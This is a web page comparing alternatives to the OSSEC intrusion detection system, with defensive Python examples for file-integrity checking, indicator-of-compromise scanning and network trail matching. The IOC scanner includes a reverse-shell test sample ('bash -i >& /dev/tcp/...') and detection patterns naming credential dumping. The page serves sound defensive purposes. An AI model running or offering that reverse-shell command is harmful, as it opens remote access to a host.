OSSEC alternatives

Looking for a better tool, or simply want to learn about alternatives? There is typically more than one option.

Alternatives (by tag)


Alternative: Samhain

Host-based intrusion detection system (HIDS) providing file integrity checking and log file monitoring

Samhain is a host-based intrusion detection system (HIDS). It provides file integrity checking and log file monitoring/analysis. Additional features are rootkit detection, port monitoring, detection of rogue SUID executables, and the detection of hidden processes.

Samhain is typically deployed as a standalone application, but it also supports centralized logging in a client/server setup, which makes it suitable for environments with many monitored systems.

Samhain is open source software and written by Rainer Wichmann.
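The file integrity checking that Samhain (and OSSEC) perform boils down to a signed baseline of file digests compared against a later scan. The following is an added example, not Samhain's or OSSEC's own code: it builds a baseline of SHA-256 digests, size and mode, protects it with an HMAC so a tampered baseline is rejected, and reports added, removed and modified files. The key, directory layout and "intrusion" are constructed for the demo; in a real deployment the key and baseline live off the monitored host or on read-only media.

```python
# Added example (not Samhain's or OSSEC's code): a minimal file-integrity
# check of the kind a HIDS performs. Baseline = {path: {sha256, size, mode}}
# for regular files under a root, serialized as JSON and tagged with
# HMAC-SHA256 so that an attacker who can write the baseline file cannot
# silently replace it. The demo key below is a placeholder.
import hashlib
import hmac
import json
import os
import stat
import tempfile


def _digest(path: str) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def scan(root: str) -> dict:
    """Return {relative_path: {sha256, size, mode}} for regular files under root."""
    entries = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            st = os.lstat(full)
            if not stat.S_ISREG(st.st_mode):
                continue  # skip symlinks, devices, sockets
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            entries[rel] = {"sha256": _digest(full), "size": st.st_size,
                            "mode": stat.S_IMODE(st.st_mode)}
    return entries


def write_baseline(root: str, key: bytes) -> bytes:
    """Serialize a scan and append an HMAC-SHA256 tag over the payload."""
    payload = json.dumps(scan(root), sort_keys=True).encode()
    tag = hmac.new(key, payload, hashlib.sha256).hexdigest().encode()
    return payload + b"\n" + tag


def load_baseline(blob: bytes, key: bytes) -> dict:
    """Verify the tag before trusting the baseline; raise on tampering."""
    payload, _, tag = blob.rpartition(b"\n")
    expected = hmac.new(key, payload, hashlib.sha256).hexdigest().encode()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("baseline integrity check failed")
    return json.loads(payload)


def compare(baseline: dict, current: dict) -> dict:
    """Diff two scans; a mode change alone (e.g. new SUID bit) counts as modified."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    modified = sorted(p for p in set(baseline) & set(current)
                      if baseline[p] != current[p])
    return {"added": added, "removed": removed, "modified": modified}


def demo() -> dict:
    """Constructed scenario: take a baseline, simulate an intrusion, compare."""
    key = b"demo-key-keep-this-off-the-monitored-host"  # placeholder
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "bin"))
        with open(os.path.join(root, "bin", "ls"), "wb") as f:
            f.write(b"original binary")
        with open(os.path.join(root, "auth.log"), "wb") as f:
            f.write(b"sshd: Accepted publickey for admin\n")
        blob = write_baseline(root, key)
        # Simulated intrusion: trojaned binary, hidden SUID file, wiped log.
        with open(os.path.join(root, "bin", "ls"), "wb") as f:
            f.write(b"trojaned binary")
        with open(os.path.join(root, "bin", ".backdoor"), "wb") as f:
            f.write(b"x")
        os.chmod(os.path.join(root, "bin", ".backdoor"), 0o4755)
        os.remove(os.path.join(root, "auth.log"))
        return compare(load_baseline(blob, key), scan(root))


if __name__ == "__main__":
    print(demo())
```

The check is only as trustworthy as the baseline: if the baseline and key sit on the same host with the same permissions as the files being watched, an intruder simply regenerates both, which is why tools like Samhain sign their database and support shipping it to a central server.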

Project details

Strengths

  • + The source code of this software is available

Samhain project page


Alternative: Bro

Bro (now called Zeek) is a network security monitoring (NSM) tool. Besides passive monitoring, it can also play an active role in forensics and incident response.

Project details

Bro is written in C++.

Strengths

  • + More than 25 contributors
  • + More than 1000 GitHub stars
  • + The source code of this software is available

Typical usage

  • security monitoring

Bro project page


Alternative: Pytbull (pytbull)


Alternative: Scirius

Scirius is a web application for managing Suricata rulesets. Both a community version and a paid version are available.

Project details

Scirius is written in Python.

Strengths

  • + The source code of this software is available

Typical usage

  • network security monitoring

Scirius project page


Alternative: Snort

Snort is a network intrusion detection system (NIDS) that runs on Linux and other platforms.

Besides detecting intrusions, Snort can run inline as an intrusion prevention system (IPS): rules that use the drop action block matching packets instead of only alerting on them.

Project details

Snort is written in C.

Strengths

  • + Supported by a large company (Cisco)

Typical usage

  • security monitoring

Snort project page


Alternative: Suricata

Network threat detection engine that acts as intrusion detection (IDS), inline intrusion prevention (IPS), and network security monitoring (NSM)

Project details

Suricata is written in C; its detection logic can be extended with Lua scripts.

Strengths

  • + More than 50 contributors
  • + The source code of this software is available

Typical usage

  • information gathering
  • intrusion detection
  • network analysis

Suricata project page


Alternative: Loki

Loki is a security tool for finding indicators of compromise (IOCs). It scans files and matches them against known-bad hashes, suspicious filenames, and YARA pattern rules.
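To make the "scan files, then pattern-match" approach concrete, here is an added example, not Loki's own code: a minimal IOC scanner that walks a directory and flags files by SHA-256 hash, filename pattern, or byte signature. The indicator sets and the scanned files are constructed placeholders, not real threat intelligence, and plain regular expressions stand in for the YARA rules a real scanner would use.

```python
# Added example (not Loki's code): a minimal IOC scanner. Three indicator
# types are checked per file: known-bad SHA-256 hash, filename pattern,
# and byte signature in the content. All indicators below are constructed
# for the demo and match nothing real.
import hashlib
import os
import re
import tempfile

# Constructed indicator sets (placeholders, not real malware indicators).
BAD_HASHES = {
    hashlib.sha256(b"MZ-this-is-the-demo-dropper").hexdigest(): "demo-dropper",
}
FILENAME_IOCS = [
    (re.compile(r"(^|/)mimikatz\.exe$", re.I), "mimikatz-name"),
    (re.compile(r"(^|/)\.[^/]+\.sh$"), "hidden-shell-script"),
]
BYTE_SIGNATURES = [
    (re.compile(rb"sekurlsa::logonpasswords"), "mimikatz-string"),
    (re.compile(rb"bash -i >& /dev/tcp/\d{1,3}(\.\d{1,3}){3}/\d+"), "reverse-shell"),
]
MAX_BYTES = 8 * 1024 * 1024  # cap how much of a file is read into memory


def scan_file(path: str) -> list:
    """Return a list of (ioc_type, ioc_name) hits for one file."""
    hits = []
    norm = path.replace(os.sep, "/")
    for pat, name in FILENAME_IOCS:
        if pat.search(norm):
            hits.append(("filename", name))
    try:
        size = os.path.getsize(path)
        with open(path, "rb") as f:
            data = f.read(MAX_BYTES)
    except OSError:
        return hits  # unreadable file: report only what we know so far
    if size <= MAX_BYTES:  # only hash files that were read in full
        digest = hashlib.sha256(data).hexdigest()
        if digest in BAD_HASHES:
            hits.append(("hash", BAD_HASHES[digest]))
    for pat, name in BYTE_SIGNATURES:
        if pat.search(data):
            hits.append(("content", name))
    return hits


def scan_tree(root: str) -> dict:
    """Scan every regular file under root; return {relative_path: hits}."""
    results = {}
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            p = os.path.join(dirpath, fn)
            if os.path.islink(p) or not os.path.isfile(p):
                continue
            hits = scan_file(p)
            if hits:
                results[os.path.relpath(p, root).replace(os.sep, "/")] = hits
    return results


def demo() -> dict:
    """Constructed file tree: one hidden reverse-shell script, one known-hash dropper, one clean file."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "tmp"))
        samples = {
            "tmp/.x.sh": b"#!/bin/sh\nbash -i >& /dev/tcp/10.0.0.5/4444 0>&1\n",
            "dropper.bin": b"MZ-this-is-the-demo-dropper",
            "notes.txt": b"nothing to see here\n",
        }
        for rel, content in samples.items():
            with open(os.path.join(root, rel), "wb") as f:
                f.write(content)
        return scan_tree(root)


if __name__ == "__main__":
    for path, hits in demo().items():
        print(path, hits)
```

Hash indicators are exact and cheap but trivially evaded by recompiling; filename and content signatures survive that, at the cost of false positives, which is why a real scanner scores and combines hits rather than alerting on any single one.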

Project details

Loki is written in Python.

Strengths

  • + Commercial support available
  • + More than 10 contributors
  • + More than 500 GitHub stars
  • + The source code of this software is available

Typical usage

  • digital forensics
  • intrusion detection
  • security monitoring

Loki project page


Alternative: Maltrail

Maltrail monitors network traffic for "trails" (known-bad domains, IP addresses, URLs and HTTP User-Agent values) that may indicate a compromised system or other malicious activity. It is well suited for intrusion detection and network monitoring.
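The trail-matching idea is simple enough to show end to end. The following is an added example, not Maltrail's own code: it applies domain, IP-range and User-Agent trails to a handful of constructed DNS/connection/HTTP log lines (Maltrail itself inspects packets; the log format here is invented for the demo, as are the trails, which use documentation addresses and example domains).

```python
# Added example (not Maltrail's code): match network log lines against
# "trails" of known-bad domains, IP ranges and User-Agent patterns.
# Domain trails match the exact name and any subdomain, on label
# boundaries, so "notevil-cdn.example" must NOT match "evil-cdn.example".
import ipaddress
import re

# Constructed trail sets (placeholders, not real threat intelligence).
DOMAIN_TRAILS = {"evil-cdn.example": "known C2 domain"}
IP_TRAILS = {ipaddress.ip_network("198.51.100.0/24"): "bulletproof hosting range"}
UA_TRAILS = {re.compile(r"^zgrab/", re.I): "mass-scanner user agent"}

# Constructed log format: "<ts> <kind> client=<ip> key=value ..."
LINE_RE = re.compile(r"^(?P<ts>\S+) (?P<kind>dns|conn|http) client=(?P<client>\S+) (?P<rest>.*)$")
KV_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')


def domain_hit(name: str):
    """Walk from the full name up to the TLD, checking each suffix on a label boundary."""
    labels = name.lower().rstrip(".").split(".")
    for i in range(len(labels)):
        candidate = ".".join(labels[i:])
        if candidate in DOMAIN_TRAILS:
            return candidate, DOMAIN_TRAILS[candidate]
    return None


def ip_hit(addr: str):
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:
        return None
    for net, why in IP_TRAILS.items():
        if ip in net:
            return str(net), why
    return None


def ua_hit(ua: str):
    for pat, why in UA_TRAILS.items():
        if pat.search(ua):
            return pat.pattern, why
    return None


def check_line(line: str):
    """Return (client, trail, reason) if the line touches a trail, else None."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    fields = {k: v.strip('"') for k, v in KV_RE.findall(m.group("rest"))}
    kind = m.group("kind")
    hit = None
    if kind == "dns":
        hit = domain_hit(fields.get("query", ""))
    elif kind == "conn":
        hit = ip_hit(fields.get("dst", "").rsplit(":", 1)[0])
    elif kind == "http":
        hit = domain_hit(fields.get("host", "")) or ua_hit(fields.get("ua", ""))
    return (m.group("client"), hit[0], hit[1]) if hit else None


def check_log(text: str) -> list:
    return [r for r in (check_line(l) for l in text.splitlines()) if r]


# Constructed sample log (not real traffic).
SAMPLE_LOG = """\
2024-03-01T10:00:01Z dns client=10.0.0.12 query=updates.evil-cdn.example
2024-03-01T10:00:02Z dns client=10.0.0.12 query=www.example.org
2024-03-01T10:00:03Z dns client=10.0.0.12 query=notevil-cdn.example
2024-03-01T10:00:04Z conn client=10.0.0.13 dst=198.51.100.23:443
2024-03-01T10:00:05Z http client=10.0.0.14 host=cdn.example.net ua="Mozilla/5.0"
2024-03-01T10:00:06Z http client=10.0.0.14 host=legit.example.net ua="zgrab/0.x"
2024-03-01T10:00:07Z http client=10.0.0.15 host=evil-cdn.example. ua="curl/8.0"
"""

if __name__ == "__main__":
    for client, trail, why in check_log(SAMPLE_LOG):
        print(f"{client} -> {trail} ({why})")
```

Matching on label boundaries and stripping the trailing dot are the two details that separate a usable trail matcher from one that either misses `evil-cdn.example.` or floods you with hits on every domain that happens to contain the string.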

Project details

Maltrail is written in Python.

Strengths

  • + More than 10 contributors
  • + More than 2000 GitHub stars
  • + The source code of this software is available

Typical usage

  • intrusion detection
  • network analysis
  • security monitoring

Maltrail project page